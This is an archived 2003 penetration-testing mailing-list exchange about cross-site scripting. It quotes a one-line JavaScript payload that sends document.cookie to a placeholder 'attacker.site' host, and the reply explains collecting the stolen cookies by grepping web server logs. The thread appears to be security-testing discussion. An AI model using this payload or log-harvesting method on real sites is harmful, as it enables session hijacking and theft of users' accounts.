Hosting Provided By

RE: Proof of Concept Tool on Web Application Security

From: Dawes, Rogan (ZA - Johannesburg) <rdawes(at)deloitte.co.za>
Date: Mon Apr 14 2003 - 01:45:15 EDT

Hi,

You are misreading the script fragment that you quoted.

What that is intended to do is fetch an image from a server under your own control, with the cookie appended to the url as a parameter. You don't have to have "snarf" be an application that uses those parameters, it could be a simple .gif or .jpg file. Then you just parse your web server logs for cookies.

E.g.

tail -f webserverlog | grep snarf

If you want something automated to react when such a session id appears, than you would need to have snarf either be a program, or have a script tailling the server logs, and reacting when it sees a new cookie.

Rogan

-----Original Message-----
From: Indian Tiger [mailto:indiantiger@mailandnews.com] Sent: 13 April 2003 09:33 AM
To: pen-test@securityfocus.com; rdawes@deloitte.co.za Subject: RE: Proof of Concept Tool on Web Application Security

Do you need help?

Hi Rogan,

Comments in-line

[script language=javascript]document.print("<img src='http://attacker.site/snarf?" + document.cookie + "'>")[/script]

I have tested this and it works perfectly fine. In my scenario I gave as follows and it was working:
<script> alert('hacked') </script>

Now I am testing Cross-Site Scripting to steal the client cookies, or any other sensitive information. I am working on my own pen-test-testing site, which is vulnerable to XSS. I was able to display the cookies of the client at
the victim's machine, but that was not my goal, my goal is to get that cookies
on my machine or any desired location. So is there any way by which I can transfer the victim's cookie or any other information at my machine without interaction of the victim.

One way of transferring cookie information from the victim's machine to attacker's machine is to create a hidden filed & then transfer cookie information to that hidden field & then post (submit) this hidden field to web
site of attacker. But this require interaction of victim, as victim must click
on submit button to post this data to attacker's site, which is not a good idea, the data should be transferred without knowledge of victim. So what should be the best way to this? How I can upload a file from victim machine to
any other server?

Any suggestions on the above topics will be highly appreciated.

Thanking you,
Sincerely,

Do you need more help?

Indian Tiger, CISSP

Costs are climbing and complaints are rising as SPAM overloads your e-mail servers and Inboxes SurfControl E-mail Filter puts the brakes on spam & viruses and gives you the reports to prove it.
http://www.securityfocus.com/SurfControl-pen-test2 Download a free trial and see just
what's going in and out of your organization.

Received on Mon Apr 14 11:06:11 2003

This message: [ Message body ]
Next message: Nicolas Gregoire: "RE: Proof of Concept Tool on Web Application Security"
Previous message: Indian Tiger: "RE: Proof of Concept Tool on Web Application Security"
Maybe in reply to: Indian Tiger: "Proof of Concept Tool on Web Application Security"
Reply: Jon Pastore: "Re: Proof of Concept Tool on Web Application Security"

Contemporary messages sorted: [ By Date ] [ By Thread ] [ By Subject ] [ By Author ] [ By messages with attachments ]

This archive was generated by hypermail 2.1.8 : Wed Aug 23 2006 - 14:02:35 EDT